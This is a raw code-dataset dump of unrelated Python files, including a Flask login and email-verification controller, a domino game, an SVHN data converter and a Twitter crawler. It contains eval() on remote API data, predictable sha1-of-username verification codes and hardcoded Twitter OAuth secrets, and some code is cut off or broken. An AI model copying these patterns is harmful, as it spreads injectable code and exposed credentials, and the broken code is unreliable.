session\n\t\t\tsession.permanent = True\n\t\t\tsession['user_id'] = user_id\n\t\t\tsession['user_name'] = User.get_name_by_id(user_id)\n\t\t\tsession['user_abbr'] = User.get_abbr_by_id(user_id)\n\t\t\treturn redirect(url_for('index'))\n\t# if not exist\n\telse:\n\t\t# get user info\n\t\turl = \"https://api.douban.com/v2/user/\" + str(user_id)\n\t\treq = urllib2.Request(url)\n\t\tresponse = urllib2.urlopen(req)\n\t\tuser_info = eval(response.read().replace('\\\\', ''))\t# remove '\\' and convert str to dict\n\n\t\t# add user\n\t\tuser_id = int(user_info['id'])\n\t\tuser_name = user_info['name']\n\t\tabbr = user_info['uid']\n\t\tavatar = user_info['avatar']\n\t\tsignature = user_info['signature']\n\t\tdesc = user_info['desc']\n\t\tlocation_id = int(user_info['loc_id']) if 'loc_id' in user_info else 0\n\t\tlocation = user_info['loc_name']\n\t\tUser.add_user(user_id, user_name, abbr, avatar, signature, desc, location_id, location)\n\n\t\t# go to the verify email page\n\t\treturn redirect(url_for('send_verify_email', user_id=user_id))\n\n# page - send verify email\n#--------------------------------------------------\n\n# view (login)\n@app.route('/send_verify_email/douban', methods=['GET', 'POST'])\ndef send_verify_email():\n\tif request.method == 'GET':\n\t\tuser_id = int(request.args['user_id'])\n\t\tform = EmailForm(user_id=user_id)\n\t\tuser_name = User.get_name_by_id(user_id)\n\t\treturn render_template('send_verify_email.html', user_name=user_name, form=form)\n\telif request.method == 'POST':\n\t\tform = EmailForm(request.form)\n\n\t\tif form.validate():\n\n\t\t\t# email\n\t\t\tt_addr = form.email.data\n\n\t\t\t# user info\n\t\t\tuser_id = int(form.user_id.data)\n\t\t\tuser_name = User.get_name_by_id(user_id)\n\n\t\t\t# add this email to user\n\t\t\tUser.add_email(user_id, t_addr)\n\n\t\t\t# gene verify url\n\t\t\tverify_code = hashlib.sha1(user_name).hexdigest()\n\t\t\tverify_url = config.SITE_DOMAIN + \"verify_email/douban/\" + str(user_id) + \"/\" + verify_code\n\n\t\t\t# prepare email content\n\t\t\tmsgText = '''\n\t\t\t\t点击下面的链接,激活你在西窗烛的帐号:
\n\t\t\t\t%s\n\t\t\t\t''' % (verify_url, verify_url)\n\t\t\tmsg = MIMEText(msgText, 'html', 'utf-8')\n\t\t\tmsg['From'] = \"西窗烛 <\" + config.SMTP_FROM + \">\"\n\t\t\tmsg['To'] = user_name + \"<\" + t_addr + \">\"\n\t\t\tmsg['Subject'] = \"欢迎来到西窗烛!\"\n\n\t\t\t# send email\n\t\t\ts = smtplib.SMTP(config.SMTP_SERVER, config.SMTP_PORT)\n\t\t\ts.login(config.SMTP_USER, config.SMTP_PASSWORD)\n\t\t\ts.sendmail(config.SMTP_FROM, t_addr, msg.as_string())\n\n\t\t\treturn redirect(url_for('verify_email_callback', state='send_succ'))\n\t\telse:\n\t\t\tuser_id = int(form.user_id.data)\n\t\t\tuser_name = User.get_name_by_id(user_id)\n\t\t\treturn render_template('send_verify_email.html', user_name=user_name, form=form)\n\n# proc - verify the code and active user (public)\n#--------------------------------------------------\n\n@app.route('/verify_email/douban//')\ndef verify_email(user_id, verify_code):\n\tuser_name = User.get_name_by_id(user_id)\n\tuser_abbr = User.get_abbr_by_id(user_id)\n\tif verify_code == hashlib.sha1(user_name).hexdigest():\n\t\tUser.active_user(user_id)\n\t\tsession.permanent = True\n\t\tsession['user_id'] = user_id\n\t\tsession['user_name'] = user_name\n\t\tsession['user_abbr'] = user_abbr\n\t\treturn redirect(url_for('verify_email_callback', state='active_succ'))\n\telse:\n\t\treturn redirect(url_for('verify_email_callback', state='active_failed'))\n\n# page - show the state of verify\n#--------------------------------------------------\n\n# view (public)\n@app.route('/verify_email_callback/douban/')\ndef verify_email_callback():\n\tstate = request.args['state']\n\tuser_id = int(request.args['user_id']) if 'user_id' in request.args else 0\n\treturn render_template('verify_email_callback.html', state=state, user_id=user_id)\n\n# proc - logout (login)\n#--------------------------------------------------\n@app.route('/logout')\ndef logout():\n\tcheck_login()\n\t\n\tsession.pop('user_id', None)\n\tsession.pop('user_name', None)\n\tsession.pop('user_abbr', None)\n\treturn redirect(url_for('index'))\n\n# page - personal page\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people/')\ndef people(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\tworks = Love_work.get_works_by_user(people['UserID'], 1, 3)\n\tfor work in works:\n\t\twork['Content'] = content_clean(work['Content'])\n\tworks_num = Love_work.get_works_num_by_user(people['UserID'])\n\n\treviews = Review.get_reviews_by_user(people['UserID'], 1, 3)\n\tfor r in reviews:\n\t\tr['Time'] = time_diff(r['Time'])\n\treviews_num = Review.get_reviews_num_by_user(people['UserID'])\n\n\ttopics = Topic.get_topics_by_user(people['UserID'], 1, 3)\n\tfor t in topics:\n\t\tt['Time'] = time_diff(t['Time'])\n\ttopics_num = Topic.get_topics_num_by_user(people['UserID'])\n\n\treturn render_template('people.html', people=people, works=works, works_num=works_num, reviews=reviews, reviews_num=reviews_num, topics=topics, topics_num=topics_num, user_name=user_name)\n\n# page - people love works page\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//love_works')\ndef people_love_works(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\n\tworks = Love_work.get_works_by_user(people['UserID'], page, num_per_page)\n\tfor work in works:\n\t\twork['Content'] = content_clean(work['Content'])\n\n\tworks_num = Love_work.get_works_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(works_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_love_works.html', people=people, works=works, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - people reviews\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//reviews')\ndef people_reviews(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\n\treviews = Review.get_reviews_by_user(people['UserID'], page, num_per_page)\n\tfor r in reviews:\n\t\tr['Time'] = time_diff(r['Time'])\n\n\treviews_num = Review.get_reviews_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(reviews_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_reviews.html', people=people, reviews=reviews, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - people topics\n#--------------------------------------------------\n\n# view (public)\n@app.route('/people//topics')\ndef people_topics(user_abbr):\n\tpeople = User.get_user_by_abbr(user_abbr)\n\tuser_name = '我' if \"user_id\" in session and session['user_id'] == people['UserID'] else people['Name']\n\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\n\ttopics = Topic.get_topics_by_user(people['UserID'], page, num_per_page)\n\tfor t in topics:\n\t\tt['Time'] = time_diff(t['Time'])\n\n\ttopics_num = Topic.get_topics_num_by_user(people['UserID'])\n\n\t# page paras\n\ttotal_page = int(math.ceil(topics_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\treturn render_template('people_topics.html', people=people, topics=topics, user_name=user_name, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)\n\n# page - informs\n#--------------------------------------------------\n\n# view (login)\n@app.route('/informs')\ndef informs():\n\tcheck_login()\n\t\n\t# pagination\n\tnum_per_page = 10\n\tpage = int(request.args['page'] if 'page' in request.args else 1)\n\t\n\tinforms = Inform.get_informs(session['user_id'], page, num_per_page)\n\tfor i in informs:\n\t\ti['Time'] = time_diff(i['Time'])\n\n\t# page paras\n\tinforms_num = Inform.get_informs_num(session['user_id'])\n\t#return str(informs_num)\n\ttotal_page = int(math.ceil(informs_num / num_per_page))\n\tpre_page = (page - 1) if page > 1 else 1\n\tif total_page == 0:\n\t\tnext_page = 1\n\telif page < total_page:\n\t\tnext_page = page + 1\n\telse:\n\t\tnext_page = total_page\n\n\tnew_informs_num = Inform.get_new_informs_num(session['user_id'])\n\n\tInform.update_check_inform_time(session['user_id'])\n\n\treturn render_template('informs.html', informs=informs, new_informs_num=new_informs_num, page=page, total_page=total_page, pre_page=pre_page, next_page=next_page)","sub_path":"xichuangzhu/controllers/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":10491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"128378445","text":"# coding=utf-8\nimport os\nimport tensorflow as tf\nimport utils as glib_utils\nimport tokenizer as glib_tokenizer\nimport tagger as glib_tagger\nimport parser as glib_parser\nimport time\nimport numpy as np\n\n\nclass Glib(object):\n def __init__(self):\n self.utils = glib_utils.glibUtils()\n self.tmp_dir = self.utils.get_tmp_dir()\n\n def analyze(self, lang, query):\n utils = self.utils\n tmp_dir = self.tmp_dir\n\n token_context = utils.get_tokenizer_context(lang)\n token_model_dir = utils.get_tokenizer_model_dir(lang)\n\n id = utils.generate_id()\n context = utils.copy_context_file(token_context, tmp_dir, id)\n context = utils.update_context(context, token_model_dir, tmp_dir, id)\n utils.write_raw(tmp_dir, id, query)\n\n tokenizer = glib_tokenizer.Tokenizer()\n tokenizer_results = tokenizer.get(context, token_model_dir, tmp_dir, id)\n if tokenizer_results is not None:\n tagger = glib_tagger.Tagger()\n if lang != 'en':\n model_dir = token_model_dir\n else:\n context = utils.get_context(lang)\n model_dir = utils.get_model_dir(lang)\n context = utils.copy_context_file(context, tmp_dir, id)\n context = utils.update_context(context, model_dir, tmp_dir, id)\n\n tagger_results = tagger.get(context, model_dir, tmp_dir, id)\n if tagger_results:\n parser = glib_parser.Parser()\n parser_results = parser.get(context, model_dir, tmp_dir, id)\n if parser_results:\n result = utils.build_response(query, tokenizer_results, tagger_results, parser_results)\n utils.remove_files(tmp_dir, id)\n return result\n else:\n utils.remove_files(tmp_dir, id)\n return None\n else:\n utils.remove_files(tmp_dir, id)\n return None\n else:\n utils.remove_files(tmp_dir, id)\n return None\n\n\n","sub_path":"syntaxnet/glib/glib.py","file_name":"glib.py","file_ext":"py","file_size_in_byte":2081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"306231025","text":"class ShoppingCart:\n # write your code here\n def __init__(self, emp_discount=None):\n self.total = 0\n self.employee_discount = emp_discount\n self.items = []\n\n def add_item(self, name, price, quantity=1):\n for q in range(0,quantity):\n self.items.append({'item_name': name, 'unit_price': price})\n self.total += price\n \n return self.total\n\n def mean_item_price(self):\n return self.total/len(self.items)\n\n def median_item_price(self):\n prices = [item['unit_price'] for item in self.items]\n l = len(prices)\n if l%2 != 0:\n return prices[l//2]\n else: \n return sum(prices[l/2-1:l/2+1])/2\n\n def apply_discount(self):\n if self.employee_discount is not None:\n return round(self.total*(1-self.employee_discount/100), 2)\n else:\n return \"Sorry, there is no discount to apply to your cart :(\"\n\n def void_last_item(self):\n if self.items is []:\n return \"There are no items in your cart!\"\n else:\n self.total -= self.items[-1]['unit_price']\n self.items.pop()","sub_path":"shopping_cart.py","file_name":"shopping_cart.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"429287189","text":"import argparse\n\nimport xlsxwriter\n\nfrom snyk import SnykClient\nfrom utils import get_default_token_path, get_token\n\n\ndef parse_command_line_args():\n parser = argparse.ArgumentParser(description=\"Snyk API Examples\")\n parser.add_argument(\n \"--orgId\", type=str, help=\"The Snyk Organisation Id\", required=True\n )\n parser.add_argument(\n \"--projectId\", type=str, help=\"The project ID in Snyk\", required=True\n )\n parser.add_argument(\n \"--outputPathExcel\",\n type=str,\n help=\"Optional. The desired output if you want Excel output (use .xlsx).\",\n )\n return parser.parse_args()\n\n\nsnyk_token_path = get_default_token_path()\nsnyk_token = get_token(snyk_token_path)\nargs = parse_command_line_args()\norg_id = args.orgId\nproject_id = args.projectId\n\n\ndef output_excel(vulns, output_path):\n excel_workbook = xlsxwriter.Workbook(output_path)\n excel_worksheet = excel_workbook.add_worksheet()\n format_bold = excel_workbook.add_format({\"bold\": True})\n\n row_index = 0\n\n col_index = 0\n lst_col_headers = list(vulns[0].keys())\n\n for ch in lst_col_headers:\n excel_worksheet.write(\n row_index, col_index, lst_col_headers[col_index], format_bold\n )\n col_index += 1\n\n for v in vulns:\n row_index += 1\n\n col_index = 0\n for k in lst_col_headers:\n excel_worksheet.write(row_index, col_index, v[k])\n col_index += 1\n\n excel_workbook.close()\n\n\nclient = SnykClient(snyk_token)\nissue_set = client.organizations.get(org_id).projects.get(project_id).issueset.all()\n\nlst_output = []\nfor v in issue_set.issues.vulnerabilities:\n print(\"\\n %s\" % v.title)\n print(\" id: %s\" % v.id)\n print(\" url: %s\" % v.url)\n\n print(\" %s@%s\" % (v.package, v.version))\n print(\" Severity: %s\" % v.severity)\n print(\" CVSS Score: %s\" % v.cvssScore)\n\n # for the excel output\n new_output_item = {\n \"title\": v.title,\n \"id\": v.id,\n \"url\": v.url,\n \"package\": \"%s@%s\" % (v.package, v.version),\n \"severity\": v.severity,\n \"cvssScore\": v.cvssScore,\n }\n lst_output.append(new_output_item)\n\nif args.outputPathExcel:\n output_excel(lst_output, args.outputPathExcel)\n","sub_path":"examples/api-demo-2-list-issues.py","file_name":"api-demo-2-list-issues.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"632940440","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 7 09:52:27 2019\n\n@author: picardge\n\"\"\"\nimport unittest\nimport random\nclass Domino():\n def __init__(self,c1,c2,etat='pioche'):\n self.c1=c1\n self.c2=c2\n self.etat= etat\n \n def __str__(self):\n return '['+str(self.c1)+' | '+str(self.c2)+']'\n \n def permute(self):\n self.c1, self.c2 = self.c2, self.c1\n return self\n\n \n\n \nclass Joueur():\n def __init__(self,numero,contenu):\n self.numero=numero\n self.contenu=contenu\n \n def __str__(self):\n s = str(self.numero) + ': '\n for domino in self.contenu:\n s += str(domino) + ' '\n return(s)\n \n def monDoubleLePlusFort(self):\n m=0\n for domino in self.contenu:\n if domino.c1==domino.c2:\n if mself.j2.monDoubleLePlusFort():\n print(cr.j1)\n print(\"C'est au joueur 1 de commencer: \")\n x=input()\n x = int(x)\n self.plateau.contenu.append(self.j1.contenu[x])\n self.j1.contenu[x].etat='plateau'\n self.j1.contenu.pop(x)\n \n return 1\n \n if self.j2.monDoubleLePlusFort()>self.j1.monDoubleLePlusFort():\n print(cr.j2)\n print(\"C'est au joueur 2 de commencer: \")\n x=input()\n x = int(x)\n self.plateau.contenu.append(self.j2.contenu[x])\n self.j2.contenu[x].etat='plateau'\n self.j2.contenu.pop(x)\n return 2\n def j1Joue(self):\n print(self.plateau)\n print(self.j1)\n x = input()\n x = list(x)\n if len(x) == 3:\n self.ajouteDomino(self.j1.contenu[int(x[0])].permute(),x[1])\n else:\n self.ajouteDomino(self.j1.contenu[int(x[0])],x[1])\n def j2Joue(self):\n print(self.plateau)\n print(self.j2)\n x = input()\n x = list(x)\n if len(x) == 3:\n self.ajouteDomino(self.j2.contenu[int(x[0])].permute(),x[1])\n \n else:\n self.ajouteDomino(self.j2.contenu[int(x[0])],x[1])\n \n \n def simulation(self,a=-1,p=True):\n if self.t==True:\n a = cr.premierTour()\n print(\"a: 0\",a)\n self.t=False\n \n \n if len(self.pioche.contenu)==0 and self.peutJouer(self.j1)==False and self.peutJouer(self.j2)==False:\n print('la partie est terminée')\n \n if a==2:\n if self.peutJouer(1)== True:\n self.j1Joue()\n if self.peutJouer(2)== True:\n self.j2Joue()\n else:\n print(\"j2 a pioché \")\n self.piocher(self.j2)\n a = 1 \n else:\n print(\"YESSSSSSSSSSSSSSSSSSS\")\n print(\"j1 a pioché \")\n self.piocher(self.j1)\n a = 2\n if a==1:\n if self.peutJouer(2)== True:\n self.j2Joue()\n if self.peutJouer(1)== True:\n self.j1Joue()\n else:\n print(\"OUUIIIIIIIIIIII\")\n print(\"j1 a pioché \")\n self.piocher(self.j1)\n a = 2\n else:\n print(\"j2 a pioché \")\n self.piocher(self.j2)\n a = 1\n \n \n \n return (self.simulation(a,p)) \n \n \nclass TestDomino(unittest.TestCase):\n def testDouble(self):\n j1=Joueur(1,[Domino(6,6),Domino(5,4),Domino(5,5),Domino(1,2)])\n self.assertEqual(j1.monDoubleLePlusFort(),6)\n j2=Joueur(1,[Domino(4,6),Domino(5,4),Domino(5,5),Domino(1,2)])\n self.assertEqual(j2.monDoubleLePlusFort(),5)\n \n \n def testAjoute(self):\n cr=Croupier()\n cr.distribution()\n cr.plateau.contenu.append(Domino(cr.j1.contenu[0].c2,6))\n cr.ajouteDomino(cr.j1.contenu[0],'g')\n self.assertEqual(len(cr.plateau.contenu),2)\n self.assertEqual(len(cr.j1.contenu),6)\n \n cr.plateau.contenu=[]\n cr.plateau.contenu.append(Domino(6,cr.j1.contenu[0].c1))\n cr.ajouteDomino(cr.j1.contenu[0],'d')\n self.assertEqual(len(cr.plateau.contenu),2)\n self.assertEqual(len(cr.j1.contenu),5)\n \n \n def testPeutJouer(self):\n cr=Croupier()\n cr.plateau.contenu.append(Domino(0,0))\n cr.j1.contenu=cr.j1.contenu + [Domino(2,1),Domino(6,5),Domino(1,3),Domino(5,2)]\n self.assertEqual(cr.peutJouer(1),False)\n cr.j1.contenu=cr.j1.contenu + [Domino(0,1),Domino(6,5),Domino(1,3),Domino(5,2)]\n self.assertEqual(cr.peutJouer(1),True)\n print(cr.plateau)\n \n \n def testPiocher(self):\n cr=Croupier()\n cr.distribution()\n cr.piocher(cr.j1)\n self.assertEqual(len(cr.j1.contenu),8)\n self.assertEqual(len(cr.pioche.contenu),13)\n cr.piocher(cr.j1)\n self.assertEqual(len(cr.j1.contenu),9)\n self.assertEqual(len(cr.pioche.contenu),12)\n \n \n \n \n \n \n\n\n \n \n \n \n \nif __name__ == \"__main__\":\n \n cr = Croupier()\n cr.distribution()\n cr.simulation()\n \n #unittest.main()\n \n\n\n","sub_path":"domino.py","file_name":"domino.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"578226484","text":"import os\nimport numpy as np\nimport h5py\nimport random\nfrom PIL import Image\nimport tensorflow as tf\nfrom data_meta import DataMeta\n\ntf.app.flags.DEFINE_string('data_dir', './data',\n 'Directory to SVHN (format 1) folders and write the converted files')\nFLAGS = tf.app.flags.FLAGS\n\n\nclass SampleReader(object):\n def __init__(self, path_to_image_files):\n self._path_to_image_files = path_to_image_files\n self._num_examples = len(self._path_to_image_files)\n self._sample_pointer = 0\n\n @staticmethod\n def get_attrs(digit_struct_mat_file, index):\n\n \"\"\"\n Returns a dictionary which contains keys: label, left, top, width and height, each key has multiple values.\n \"\"\"\n attrs = {}\n f = digit_struct_mat_file\n item = f['digitStruct']['bbox'][index].item()\n for key in ['label', 'left', 'top', 'width', 'height']:\n attr = f[item][key]\n values = [f[attr.value[i].item()].value[0][0]\n for i in range(len(attr))] if len(attr) > 1 else [attr.value[0][0]]\n attrs[key] = values\n return attrs\n\n @staticmethod\n def do_preprocess(image, bbox_left, bbox_top, bbox_width, bbox_height):\n\n \"\"\"\n Returns the preprocessed image by cropping and resizing\n \"\"\"\n cropped_left, cropped_top, cropped_width, cropped_height = (int(round(bbox_left - 0.15 * bbox_width)),\n int(round(bbox_top - 0.15 * bbox_height)),\n int(round(bbox_width * 1.3)),\n int(round(bbox_height * 1.3)))\n image = image.crop([cropped_left, cropped_top, cropped_left + cropped_width, cropped_top + cropped_height])\n image = image.resize([64, 64])\n return image\n\n @staticmethod\n def int64_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\n\n @staticmethod\n def float_feature(value):\n return tf.train.Feature(float_list=tf.train.FloatList(value=[value]))\n\n @staticmethod\n def bytes_feature(value):\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\n\n def read_and_convert(self, digit_struct_mat_file):\n\n \"\"\"\n Read and convert to sample, returns None if no data is available.\n \"\"\"\n if self._sample_pointer == self._num_examples:\n return None\n path_to_image_file = self._path_to_image_files[self._sample_pointer]\n index = int(path_to_image_file.split('/')[-1].split('.')[0]) - 1\n self._sample_pointer += 1\n\n # get sample attributes\n\n attrs = SampleReader.get_attrs(digit_struct_mat_file, index)\n label_of_digits = attrs['label']\n length = len(label_of_digits)\n\n # if length is greater than 5 skip this example\n\n if length > 5:\n return self.read_and_convert(digit_struct_mat_file)\n\n digits = [10, 10, 10, 10, 10] # digit 10 represents no digit\n for idx, label_of_digit in enumerate(label_of_digits):\n digits[idx] = int(label_of_digit if label_of_digit != 10 else 0) # label 10 is essentially digit zero\n\n # gets the bounding boxes of the digits to crop the image\n\n attrs_left, attrs_top, attrs_width, attrs_height = map(lambda x: [int(i) for i in x], \n [attrs['left'], attrs['top'], attrs['width'], attrs['height']])\n min_left, min_top, max_right, max_bottom = (min(attrs_left),\n min(attrs_top),\n max(map(lambda x, y: x + y, attrs_left, attrs_width)),\n max(map(lambda x, y: x + y, attrs_top, attrs_height)))\n center_x, center_y, max_side = ((min_left + max_right) / 2.0,\n (min_top + max_bottom) / 2.0,\n max(max_right - min_left, max_bottom - min_top))\n bbox_left, bbox_top, bbox_width, bbox_height = (center_x - max_side / 2.0,\n center_y - max_side / 2.0,\n max_side,\n max_side)\n image = np.array(SampleReader.do_preprocess(Image.open(path_to_image_file), bbox_left, bbox_top, bbox_width, bbox_height)).tobytes()\n\n sample = tf.train.sample(features=tf.train.Features(feature={\n 'image': SampleReader.bytes_feature(image),\n 'length': SampleReader.int64_feature(length),\n 'digits': tf.train.Feature(int64_list=tf.train.Int64List(value=digits))\n }))\n return sample\n\n\ndef create_tfrecords_meta_file(num_train_examples, num_val_examples, num_test_examples,\n tfrecords_meta_file):\n\n \"\"\"\n Saves the meta file to the tfrecords meta file\n \"\"\"\n\n meta = DataMeta()\n meta.num_train_examples = num_train_examples\n meta.num_val_examples = num_val_examples\n meta.num_test_examples = num_test_examples\n meta.save(tfrecords_meta_file)\n\n\ndef convert_to_tfrecords(path_to_dataset_dir_and_digit_struct_mat_file_tuples,\n path_to_tfrecords_files, choose_writer_callback):\n\n \"\"\"\n input: path_to_dataset_dir_and_digit_struct_mat_file_tuples => (datset dir,digit_struct_mat_file)\n path_to_tfrecords_files => tfrecords file path\n\n funct: converts the image and writes them in tfrecords file\n\n output: returns the number of examples converted\n\n \"\"\"\n num_examples = []\n writers = []\n\n for path_to_tfrecords_file in path_to_tfrecords_files:\n num_examples.append(0)\n writers.append(tf.python_io.TFRecordWriter(path_to_tfrecords_file))\n\n for path_to_dataset_dir, path_to_digit_struct_mat_file in path_to_dataset_dir_and_digit_struct_mat_file_tuples:\n path_to_image_files = tf.gfile.Glob(os.path.join(path_to_dataset_dir, '*.png'))\n total_files = len(path_to_image_files)\n\n\n with h5py.File(path_to_digit_struct_mat_file, 'r') as digit_struct_mat_file:\n sample_reader = SampleReader(path_to_image_files)\n for index, path_to_image_file in enumerate(path_to_image_files):\n\n sample = sample_reader.read_and_convert(digit_struct_mat_file)\n if sample is None:\n break\n\n idx = choose_writer_callback(path_to_tfrecords_files)\n writers[idx].write(sample.SerializeToString())\n num_examples[idx] += 1\n\n for writer in writers:\n writer.close()\n\n return num_examples\n\n\n\n\ndef main(_):\n\n \"\"\"\n Process the train, validation , and test data and create the tfrecords file for each set\n \"\"\"\n\n # Getting the data and their meta files path\n train_dir = os.path.join(FLAGS.data_dir, 'train')\n test_dir = os.path.join(FLAGS.data_dir, 'test')\n extra_dir = os.path.join(FLAGS.data_dir, 'extra')\n train_digit_struct_mat_file = os.path.join(train_dir, 'digitStruct.mat')\n test_digit_struct_mat_file = os.path.join(test_dir, 'digitStruct.mat')\n extra_digit_struct_mat_file = os.path.join(extra_dir, 'digitStruct.mat')\n\n train_tfrecords_file = os.path.join(FLAGS.data_dir, 'train.tfrecords')\n val_tfrecords_file = os.path.join(FLAGS.data_dir, 'val.tfrecords')\n test_tfrecords_file = os.path.join(FLAGS.data_dir, 'test.tfrecords')\n tfrecords_meta_file = os.path.join(FLAGS.data_dir, 'meta.json')\n\n\n\n for path_to_file in [train_tfrecords_file, val_tfrecords_file, test_tfrecords_file]:\n assert not os.path.exists(path_to_file), 'The file %s already exists' % path_to_file\n\n # Processing the train and Validation data\n\n [num_train_examples, num_val_examples] = convert_to_tfrecords([(train_dir, train_digit_struct_mat_file),\n (extra_dir, extra_digit_struct_mat_file)],\n [train_tfrecords_file, val_tfrecords_file],\n lambda paths: 0 if random.random() > 0.1 else 1)\n \n # Processing test data\n\n [num_test_examples] = convert_to_tfrecords([(test_dir, test_digit_struct_mat_file)],\n [test_tfrecords_file],\n lambda paths: 0)\n\n # Create tfrecords fmeta file for train , validation and test data\n\n create_tfrecords_meta_file(num_train_examples, num_val_examples, num_test_examples,\n tfrecords_meta_file)\n\n print ('Completed processing')\n\n\nif __name__ == '__main__':\n tf.app.run(main=main)\n","sub_path":"Project/project_LAP/project_LAP/Multi_digit_recognition/create_tfrecords.py","file_name":"create_tfrecords.py","file_ext":"py","file_size_in_byte":8986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"296010919","text":"import turtle\ns = turtle.getscreen()\nt = turtle.Turtle()\nT = turtle.title('Shape maker dumb')\nt.pensize(5)\nturtle.bgcolor('black')\nt.fillcolor(\"white\")\nt.pencolor('white')\na = 0\nt.begin_fill()\nwhile a <= 2:\n a = int(input('What sided shape? '))\nfor i in range(1,a+1):\n if a > 5:\n if i%2 == 1:\n t.pencolor('white')\n else:\n t.pencolor('black')\n L = 180*(a-2)\n if a >= 10:\n t.fd(50/(a//10))\n else:\n t.fd(50)\n t.lt(180-(L/a))\nt.end_fill()\nt.penup()\nt.color('black','black')\nt.fd(-100)\n","sub_path":"tutle.py","file_name":"tutle.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"31"}
+{"seq_id":"576151863","text":"import re, time\nimport graphmanager as graph\nfrom instagram import client\nfrom crawler import Crawler\nfrom httplib2 import ServerNotFoundError\nimport tweepy\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom tweepy.streaming import StreamListener\n\n# constant storing the social network type\nSN = 'TW'\n\nMAX_ID_REGEX = re.compile(r'max_id=([^&]+)')\nCURSOR_REGEX = re.compile(r'cursor=([^&]+)')\n\n\n#####TWITTER KEYS#####\nCONSUMER_KEY = 'ieZUZgZrSJJE0QLBBOsgXg'\nCONSUMER_SECRET = 'PlIpSrh6unKYZISSDieBIFAB3D9f6aSh4p4Dmcn8Q'\nOAUTH_TOKEN = '1015949947-0Akq5OBnEzTp7OwaIuvLNiKN6L52FNLVOW9yIyf'\nOAUTH_TOKEN_SECRET = 'SJz3nXcyGt2lIKhmPiFg5VlTdHLbrRSPRRgUZ552xfe1e'\n####Twitter auth handler####\nauth = OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)\nauth.set_access_token(OAUTH_TOKEN,OAUTH_TOKEN_SECRET)\napi = tweepy.API(auth)\n\nclass twitterCrawler(Crawler):\n def __init__(self, social_network):\n super(twitterCrawler, self).__init__(social_network)\n\n def get_first_user(self):\n '''Get the first user to init the graph.'''\n # entry point to the graph: a user named smhopeless\n # this guy is a music producer from pamplona\n seed_user_id = 79708782\n # create first user and add him to the graph\n # get user info from Instagram\n retry = True\n while retry:\n try:\n time.sleep(0.7)\n user_info = api.get_user(seed_user_id)\n except ServerNotFoundError as e:\n retry = True\n retry = False\n # create first user\n user = graph.User(\n social_network=self.social_network, \n external_id=user_info.id, \n username=user_info.screen_name, \n url='http://twitter.com/' + user_info.screen_name, \n completed=False\n )\n return user\n\n def get_user_profile(self, user):\n '''Get user profile.'''\n # add user profile to the graph as a resource\n retry = True\n while retry:\n try:\n time.sleep(0.7)\n user_info = api.get_user(user.external_id)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n return None\n if user_info.description is not None:\n raw_content = user_info.description\n if user_info.url:\n raw_content += ' ' + user_info.url\n\n # create user profile resource and add it to the graph\n resource = graph.Resource(\n social_network=user.social_network,\n external_id=user.external_id,\n url='http://twitter.com/' + user.username,\n raw_content=raw_content,\n location_name=None,\n location_lat=None,\n location_lon=None\n )\n return resource\n else:\n return None\n\n def get_user_resources(self, user):\n '''Get resources from the user.'''\n resources = []\n max_id = ''\n while True:\n followees_page = []\n next = ''\n retry = True\n error = False\n while retry:\n try:\n time.sleep(0.7) # be nice with the API\n if max_id == '':\n recent_media = api.user_timeline(user_id=user.external_id, count=33)\n else:\n recent_media = api.user_timeline(user_id=user.external_id, max_id=max_id, count=33)\n retry = False\n except ServerNotFoundError as e:\n retry = True\n except:\n error = 